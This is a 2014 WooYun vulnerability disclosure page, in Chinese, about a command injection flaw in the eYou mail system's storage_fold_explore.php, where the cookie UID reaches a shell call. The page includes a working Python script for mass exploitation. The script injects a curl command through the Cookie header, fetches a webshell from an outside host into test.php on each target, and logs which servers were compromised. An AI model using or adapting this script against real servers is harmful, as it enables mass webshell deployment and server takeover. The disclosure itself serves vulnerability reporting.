亿邮邮件系统命令执行漏洞导致批量Getwebshell

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-058531

漏洞标题：亿邮邮件系统命令执行漏洞导致批量Getwebshell

漏洞作者： conqu3r

提交时间：2014-04-26 15:02

修复时间：2014-06-10 15:03

公开时间：2014-06-10 15:03

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-04-26：细节已通知厂商并且等待厂商处理中
2014-04-30：厂商已经确认，细节仅向厂商公开
2014-05-10：细节向核心白帽子及相关领域专家公开
2014-05-20：细节向普通白帽子公开
2014-05-30：细节向实习白帽子公开
2014-06-10：细节向公众公开

简要描述：

这套系统还有很多问题，能登录就更多问题了。

详细说明：

user/storage_fold_explore.php

<?php
/**
 * 用户网络存储目录列表
 *
 * 该页面显示登录邮箱用户的网络存储目录列表，选择后保存邮件附件到指定的目录中。
 *
 * @author FengHui <fenghui@eyou.net>
 * @copyright 199902008 eYou.net
 * @version storage_explore.php 2008/11/12
 */
require_once('/var/eyou/apache/htdocs/config.php');
require_once(PATH.'inc/function.php');
require_once(PATH.'inc/libeyou.php');
require_once(PATH.'inc/operate.php');
require_once(PATH.'inc/user.config.php');
$skin               = getCookieUserValue('SKIN');
$uid                = getCookieUserValue('UID');
$domain             = getCookieUserValue('DOMAIN');
$user_dir_path      = getUserDirPath($uid, $domain);
$storage_index_path = $user_dir_path.'/storage/Index/';
$storage_data_path  = $user_dir_path.'/storage/Data/';
$file_name          = htmlspecialchars(get('file'));
$att                = htmlspecialchars(get('att'));
?>

GetUser_DirPath在/inc/function.php下。

function getUserDirPath($uid, $domain) {
    $cmd = "/var/eyou/sbin/hashid $uid $domain";
    $path = `$cmd`;
    $path = trim($path);
    return $path;
}

漏洞证明：

利用代码：

__author__ = 'zengzhang'
import time,sys
import urllib,urllib2
from urlparse import urlparse
def Getwebshell(url):
    url=url.strip()
    header={"Cookie":"USER=UID%3d1|curl http://conqu3r.paxmac.org/test.txt>>test.php&DOMAIN%3d127.0.0.1"}
    try:
        request=urllib2.Request(url,None,headers=header)
        rep=urllib2.urlopen(request)
    except:
        pass
    Indentified(url)
def Readfile(filen):
    fp=open(filen,'r')
    for url in fp:
        if url!='':
            Getwebshell(url)
def Indentified(url):
    url=url[:-19]
    url=url+"test.php"
    try:
        f=urllib.urlopen(url).getcode()
        if f==200:
            fp=open("shell.txt","w+")
            fp.write(url+"\n")
            fp.close()
    except:
        pass
Readfile("url.txt")

url.txt内容为：http://mail.bjsasc.com/user/storage_fold_explore.php形式

修复方案：

你们懂的。。。

版权声明：转载请注明来源 conqu3r@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-04-30 10:59

厂商回复：

和之前的重复了，已出补丁，多谢提供！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-058531

漏洞标题：亿邮邮件系统命令执行漏洞导致批量Getwebshell

相关厂商：北京亿中邮信息技术有限公司

漏洞作者： conqu3r

提交时间：2014-04-26 15:02

修复时间：2014-06-10 15:03

公开时间：2014-06-10 15:03

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 conqu3r@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-058531

漏洞标题：亿邮邮件系统命令执行漏洞导致批量Getwebshell

相关厂商：北京亿中邮信息技术有限公司

漏洞作者： conqu3r

提交时间：2014-04-26 15:02

修复时间：2014-06-10 15:03

公开时间：2014-06-10 15:03

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-058531"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 conqu3r@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：